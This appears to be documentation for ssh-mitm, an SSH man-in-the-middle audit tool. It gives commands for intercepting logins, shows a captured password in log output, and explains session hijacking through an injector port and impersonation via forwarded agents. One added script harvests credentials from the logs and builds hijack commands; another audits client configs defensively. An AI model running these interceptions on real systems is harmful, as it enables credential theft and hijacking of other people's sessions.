Description

SSH man-in-the-middle server for security audits, supporting public key authentication, session hijacking and file manipulation

Features

  • Hijacking and logging of terminal sessions
  • Support for SSH commands (e.g. git over SSH)
  • SCP and SFTP
    • store files
    • replace files
    • inject additional files
  • Agent Forwarding
  • Port Forwarding
  • Check and test clients against known vulnerabilities
  • Plugin support

Connect to the network

To start an intercepting SSH-MITM server listening on port 10022, a single command is enough. --remote-host names the real SSH server that intercepted sessions are forwarded to.

$ ssh-mitm --remote-host 192.168.0.x

Now connect a client to the ssh-mitm server (proxyserver is the host ssh-mitm runs on).

$ ssh -p 10022 user@proxyserver

The credentials the client presented appear in the log output.

2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:
    Remote Address: 192.168.0.x
    Port: 22
    Username: user
    Password: supersecret
    Key: None
    Agent: None

Hijack SSH sessions

When a client connects, ssh-mitm starts an additional local server for that session, the injector shell, which is used for session hijacking.

[INFO] created injector shell on port 34463

To hijack this session, connect to the injector port with any SSH client.

$ ssh -p 34463 127.0.0.1
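As an added example (not part of ssh-mitm or its documentation), the POSIX shell functions below parse the two pieces of log output shown in this and the previous section, the credential block and the "created injector shell" line, and assemble the hijack command from them. The log text is constructed to match the format above; the field names and the port number are taken from the sample output and are assumptions about its layout.

```shell
#!/bin/sh
# Added example, not part of ssh-mitm: extract credentials and the injector
# port from ssh-mitm log output and build the hijack command.
# SAMPLE_LOG is constructed to mirror the log format shown on this page.

SAMPLE_LOG='2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:
    Remote Address: 192.168.0.10
    Port: 22
    Username: user
    Password: supersecret
    Key: None
    Agent: None
2021-01-01 11:38:27,001 [INFO] created injector shell on port 34463'

# log_field NAME: print the value of the first "NAME: value" line read from stdin.
# Works for multi-word names such as "Remote Address" because the name is
# substituted into the sed pattern as-is.
log_field() {
    sed -n "s/^[[:space:]]*$1: *//p" | sed -n '1p'
}

# injector_port: print the port from the first "created injector shell" line on stdin.
injector_port() {
    sed -n 's/.*created injector shell on port \([0-9][0-9]*\).*/\1/p' | sed -n '1p'
}

# hijack_command PORT: the command from the "Hijack SSH sessions" section.
# The injector shell is reached on the ssh-mitm host itself, hence 127.0.0.1.
hijack_command() {
    printf 'ssh -p %s 127.0.0.1\n' "$1"
}

# summarize: one line per intercepted session, as an auditor would log it.
summarize() {
    user=$(printf '%s\n' "$SAMPLE_LOG" | log_field Username)
    pass=$(printf '%s\n' "$SAMPLE_LOG" | log_field Password)
    target=$(printf '%s\n' "$SAMPLE_LOG" | log_field 'Remote Address')
    port=$(printf '%s\n' "$SAMPLE_LOG" | injector_port)
    printf 'target=%s user=%s password=%s hijack="%s"\n' \
        "$target" "$user" "$pass" "$(hijack_command "$port")"
}

summarize
```

In a real run, replace SAMPLE_LOG with the ssh-mitm log file (e.g. tail -f it into the functions) so that each new session yields its own hijack command.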

Advanced usage

SSH-MITM proxy server is capable of advanced man-in-the-middle attacks and can be used in scenarios where the remote host is not known in advance, where a single remote host is not sufficient, or where public key authentication is used.

Public key authentication

Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.

The advantage is that no confidential data is sent to the remote host: the private key never leaves the client, so there is nothing for a man in the middle to capture and replay.

Because of this design, SSH-MITM proxy server cannot reuse the data provided during authentication. The signature the client sends is bound to the session between client and proxy, so it does not let the proxy authenticate to the real host.

If you need to intercept a client that uses public key authentication, there are some options.

SSH supports agent forwarding, which lets a remote host use the client's local agent to authenticate to a further host.

SSH-MITM proxy server is able to request the forwarded agent from the client and use it to authenticate to the real remote host. With this feature, SSH-MITM proxy server can perform a full man-in-the-middle attack against key-based logins as well.

To use agent forwarding, SSH-MITM proxy server must be started with --request-agent.

$ ssh-mitm --request-agent --remote-host 192.168.0.x

The client must be started with agent forwarding enabled (-A); a client that does not forward its agent cannot be impersonated this way.

$ ssh -A -p 10022 user@proxyserver
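Whether a client is exposed to this depends on two settings: it has to forward its agent, and it has to accept the proxy's host key in place of the real server's. The following POSIX shell script is an added example, not part of ssh-mitm, that audits an OpenSSH client config for exactly those settings (ForwardAgent set to anything but no, StrictHostKeyChecking no or off, and UserKnownHostsFile /dev/null) and shows a weak config next to a hardened one. Both config texts are constructed for the example, and the audit only parses the "Keyword value" form, not "Keyword=value".

```shell
#!/bin/sh
# Added example (not part of ssh-mitm): audit an OpenSSH client config for the
# settings that let a forwarded-agent MITM succeed without user interaction.
# Both configs below are constructed for this example.

WEAK_CONFIG='Host *
    ForwardAgent yes
    StrictHostKeyChecking no
    UserKnownHostsFile /dev/null'

HARDENED_CONFIG='Host *
    ForwardAgent no
    StrictHostKeyChecking yes
Host build.internal
    # forward nothing, offer only the key configured for this host
    ForwardAgent no
    IdentitiesOnly yes'

# audit_config: reads an ssh_config on stdin, prints one FINDING per risky
# line and returns 1 if anything was found, 0 otherwise.
# Simplification: only the "Keyword value" form is parsed, not "Keyword=value".
audit_config() {
    awk '
        BEGIN { bad = 0 }
        /^[ \t]*#/ || NF < 2 { next }        # skip comments and blank lines
        { key = tolower($1); val = tolower($2) }
        # any value other than "no" (yes, or an agent socket path) forwards the agent
        key == "forwardagent" && val != "no" {
            print "FINDING line " NR ": ForwardAgent " $2 " - agent is offered to every matching host"; bad = 1 }
        # with checking off, the unknown key of the proxy is accepted silently
        key == "stricthostkeychecking" && (val == "no" || val == "off") {
            print "FINDING line " NR ": StrictHostKeyChecking " $2 " - unknown or changed host keys are accepted silently"; bad = 1 }
        # host keys are never remembered, so a changed key is never noticed
        key == "userknownhostsfile" && val == "/dev/null" {
            print "FINDING line " NR ": UserKnownHostsFile /dev/null - host keys are never remembered"; bad = 1 }
        END { exit bad }
    '
}

echo "== weak client config =="
printf '%s\n' "$WEAK_CONFIG" | audit_config || echo "=> interception via agent forwarding is feasible"
echo "== hardened client config =="
printf '%s\n' "$HARDENED_CONFIG" | audit_config && echo "=> no findings"
```

Run it against ~/.ssh/config and /etc/ssh/ssh_config on the clients you audit; a per-host block with ForwardAgent yes is the usual way the weak setting survives in otherwise hardened configs, which is why the check reports line numbers rather than just a verdict.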

Intercept git

In most cases, when git is used over SSH, public key authentication is used. The git command itself has no option to forward the agent.

To enable agent forwarding, run git with the GIT_SSH_COMMAND environment variable set to an ssh command that includes -A.

# start the ssh-mitm server: forward to github.com, request the client's agent, use the debug_traffic scp interface
ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic
# invoke git commands
GIT_SSH_COMMAND="ssh -A" git clone ssh://git@127.0.0.1:10022/ssh-mitm/ssh-mitm.git

Intercept rsync

When ssh-mitm is used to intercept rsync, the proxy port must be passed to the ssh command that rsync runs, via its -e option. The agent can be forwarded there as well, if needed.

To sync a local directory to a remote directory through the proxy, run rsync with the following parameters.

rsync -r -e 'ssh -p 10022 -A' /local/folder/ user@127.0.0.1:/remote/folder/

Further steps

SSH-MITM has some client exploits integrated, which can be used to audit various ssh clients like OpenSSH and PuTTY.

Full Documentation: https://docs.ssh-mitm.at
